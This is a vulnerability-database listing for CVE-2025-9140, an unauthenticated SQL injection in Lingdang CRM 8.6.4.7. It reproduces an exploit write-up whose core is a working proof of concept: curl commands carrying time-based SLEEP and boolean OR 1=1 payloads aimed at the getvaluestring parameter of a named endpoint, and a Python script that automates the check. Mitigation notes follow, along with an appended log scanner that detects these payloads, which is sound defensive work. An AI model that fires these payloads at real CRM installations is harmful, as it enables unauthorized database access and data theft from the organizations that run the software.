Lingdang CRM 8.6.4.7 SQL Injection

๐Ÿ—“๏ธย 26 Aug 2025ย 00:00:00Reported byย Beatriz Fresno NaumovaTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstorm.news๐Ÿ‘ย 121ย Views

Lingdang CRM 8.6.4.7 is vulnerable to SQL injection via the getvaluestring parameter. The flaw allows unauthenticated time-based and boolean-based blind injection and is fixed in 8.6.5.

Related

| Reporter | Title | Published |
|---|---|---|
| CNNVD | Lingdang CRM SQL Injection Vulnerability | 19 Aug 2025 00:00 |
| CNVD | Lingdang CRM SQL Injection Vulnerability | 26 Aug 2025 00:00 |
| CVE | CVE-2025-9140 | 19 Aug 2025 13:32 |
| Cvelist | CVE-2025-9140 Shanghai Lingdang Information Technology Lingdang CRM tabdetail_moduleSave.php sql injection | 19 Aug 2025 13:32 |
| Exploit DB | Lingdang CRM 8.6.4.7 - SQL Injection | 26 Aug 2025 00:00 |
| EUVD | EUVD-2025-25171 | 3 Oct 2025 20:07 |
| NVD | CVE-2025-9140 | 19 Aug 2025 14:15 |
| Packet Storm | Lingdang CRM 8.6.4.7 SQL Injection | 23 Jan 2026 00:00 |
| Positive Technologies | PT-2025-33732 · Unknown · Lingdang Crm | 19 Aug 2025 00:00 |
| RedhatCVE | CVE-2025-9140 | 21 Aug 2025 14:25 |

    # Exploit Title: Lingdang CRM 8.6.4.7 - SQL Injection
    # Google Dork: N/A
    # Date: 2025-08-19
    # Exploit Author: Beatriz Fresno Naumova
    # Vendor: Shanghai Lingdang Information Technology
    # Software Link: (N/A – commercial product)
    # Version: <= 8.6.4.7 (fixed in 8.6.5.x per vendor advisory)
    # Tested on: Generic LAMP stack, PHP 7/8 (PoC uses HTTP only; no OS dependency)
    # CVE : CVE-2025-9140
    
    # Summary
    # The endpoint /crm/crmapi/erp/tabdetail_moduleSave.php is vulnerable to SQL injection via the
    # 'getvaluestring' parameter. An unauthenticated remote attacker can perform boolean/time-based
    # blind SQL injection. Vendor states this was fixed by adopting parameterized queries in v8.6.5+.
    
    # Route
    #   /crm/crmapi/erp/tabdetail_moduleSave.php
    # Parameter
    #   getvaluestring (GET or POST)
    
    # Notes
    # * This PoC does NOT target a live site. Replace TARGET with a lab host you own.
    # * Demonstrates time-based blind (SLEEP) and boolean-based payloads.
    
    # --- Quick PoC with curl (time-based blind) ---
    # Expect ~5s response delay on vulnerable targets.
    
    # GET variant:
    curl -i -k "http://TARGET/crm/crmapi/erp/tabdetail_moduleSave.php?getvaluestring='||(SELECT SLEEP(5))--+-"
    
    # POST variant:
    curl -i -k -X POST "http://TARGET/crm/crmapi/erp/tabdetail_moduleSave.php" \
      --data "getvaluestring='||(SELECT SLEEP(5))--+-"
    
    # --- Boolean-based example (response/body differences may vary by deployment) ---
    curl -s -k "http://TARGET/crm/crmapi/erp/tabdetail_moduleSave.php?getvaluestring=' OR 1=1-- -" -o /tmp/true.html
    curl -s -k "http://TARGET/crm/crmapi/erp/tabdetail_moduleSave.php?getvaluestring=' OR 1=2-- -" -o /tmp/false.html
    # Compare /tmp/true.html vs /tmp/false.html for observable differences.
    
    # --- Python 3 PoC (time-based) ---
    # Save as lingdang_sqli_poc.py and run:  python3 lingdang_sqli_poc.py http://TARGET
    
    import sys, time, requests
    
    def test_time_sqli(base):
        url_get = f"{base.rstrip('/')}/crm/crmapi/erp/tabdetail_moduleSave.php"
        payload = "'||(SELECT SLEEP(5))--+-"
        try:
            t0 = time.time()
            r = requests.get(url_get, params={"getvaluestring": payload}, timeout=30, verify=False)
            dt = time.time() - t0
            print(f"[+] GET status={r.status_code} elapsed={dt:.2f}s")
            if dt >= 5:
                print("[+] Likely vulnerable to time-based SQLi via GET.")
            else:
                print("[-] No significant delay observed via GET.")
        except Exception as e:
            print(f"[!] GET error: {e}")
    
        try:
            t0 = time.time()
            r = requests.post(url_get, data={"getvaluestring": payload}, timeout=30, verify=False)
            dt = time.time() - t0
            print(f"[+] POST status={r.status_code} elapsed={dt:.2f}s")
            if dt >= 5:
                print("[+] Likely vulnerable to time-based SQLi via POST.")
            else:
                print("[-] No significant delay observed via POST.")
        except Exception as e:
            print(f"[!] POST error: {e}")
    
    if __name__ == "__main__":
        if len(sys.argv) != 2:
            print(f"Usage: {sys.argv[0]} http://TARGET")
            sys.exit(1)
        requests.packages.urllib3.disable_warnings()
        test_time_sqli(sys.argv[1])
    
    # --- Impact ---
    # Confidentiality, integrity, availability compromise via SQL injection (CWE-89).
    
    # --- Mitigations ---
    # 1) Use parameterized queries / prepared statements for getvaluestring.
    # 2) Server-side input validation and allow-listing for the parameter.
    # 3) Web Application Firewall (WAF) rules to block SQLi patterns on this route.
    
    # --- Disclosure ---
    # Public identifiers: CVE-2025-9140 (VulDB VDB-320520).
    # Vendor reportedly fixed in 8.6.5+ with parameterized queries.
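
A defender-side companion to the PoC and its mitigation list, added here and not part of the original advisory or the vendor's code: it scans web access logs for requests to the vulnerable route whose getvaluestring carries the payload shapes shown above, and uses request duration to corroborate time-based probing. The log layout (combined format plus a trailing request-time field), the sample lines, and the names `inspect_line` and `scan` are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

ROUTE = "/crm/crmapi/erp/tabdetail_moduleSave.php"  # route named in the advisory
PARAM = "getvaluestring"                            # parameter named in the advisory

# Assumed log layout: combined format with request time (seconds) as last field.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" (?P<rt>\d+(?:\.\d+)?)$')

# Indicators derived only from the payload shapes in the PoC above.
INDICATORS = {
    "quote": re.compile(r"'"),
    "sleep_call": re.compile(r"\bsleep\s*\(", re.I),
    "subselect": re.compile(r"\(\s*select\b", re.I),
    "tautology": re.compile(r"\bor\s+\d+\s*=\s*\d+", re.I),
    "sql_comment": re.compile(r"--(?:\s|\+|-|$)"),
}

def inspect_line(line, slow_seconds=5.0):
    """Return a finding for a suspicious request to ROUTE, or None."""
    m = LINE_RE.match(line.strip())
    url = urlsplit(m["target"]) if m else None
    if url is None or url.path != ROUTE:
        return None
    values = parse_qs(url.query, keep_blank_values=True).get(PARAM, [])
    hits = sorted(n for n, rx in INDICATORS.items() if any(rx.search(v) for v in values))
    slow = float(m["rt"]) >= slow_seconds
    if not hits and not (slow and m["method"] == "POST"):
        return None
    # A delay corroborates time-based blind; a slow POST has no logged body (timing only).
    verdict = ("high" if slow else "medium") if hits else "review"
    return {"ip": m["ip"], "method": m["method"], "verdict": verdict, "indicators": hits}

def scan(log_text):
    return [f for f in map(inspect_line, log_text.splitlines()) if f]

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [19/Aug/2025:10:00:01 +0000] "GET /crm/crmapi/erp/tabdetail_moduleSave.php?getvaluestring=%27%7C%7C%28SELECT+SLEEP%285%29%29--%2B- HTTP/1.1" 200 512 "-" "curl/8.5.0" 5.031
203.0.113.7 - - [19/Aug/2025:10:00:09 +0000] "GET /crm/crmapi/erp/tabdetail_moduleSave.php?getvaluestring=%27%20OR%201%3D1--%20- HTTP/1.1" 200 2048 "-" "curl/8.5.0" 0.044
203.0.113.7 - - [19/Aug/2025:10:00:15 +0000] "POST /crm/crmapi/erp/tabdetail_moduleSave.php HTTP/1.1" 200 512 "-" "python-requests/2.32.0" 5.027
198.51.100.20 - - [19/Aug/2025:10:01:00 +0000] "GET /crm/crmapi/erp/tabdetail_moduleSave.php?getvaluestring=abc123 HTTP/1.1" 200 2048 "-" "Mozilla/5.0" 0.038
"""

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```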


Published: 26 Aug 2025 00:00 (current)
Vulners AI Score: 8.5 (High risk)
CVSS 3.1: 6.3 - 8.8
CVSS 4: 5.3
CVSS 2: 6.5
CVSS 3: 6.3
EPSS: 0.00143